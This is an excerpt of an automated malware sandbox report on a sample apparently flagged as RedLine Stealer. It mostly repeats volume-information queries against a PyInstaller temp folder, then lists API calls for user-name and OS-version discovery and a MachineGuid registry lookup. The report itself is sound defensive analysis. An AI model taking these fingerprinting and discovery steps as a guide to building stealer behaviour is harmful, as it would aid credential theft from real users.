                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\msgs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\msgs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\msgs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\msgs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\msgs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\msgs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\opt0.4 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America\Argentina VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BCC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_00007FF741BCC330
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5325C0 GetUserNameW,42_2_00007FFB1C5325C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE4F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,14_2_00007FF741BE4F10
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0040559A GetVersionExW,GetVersionExW,13_2_0040559A
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RedLine Stealer
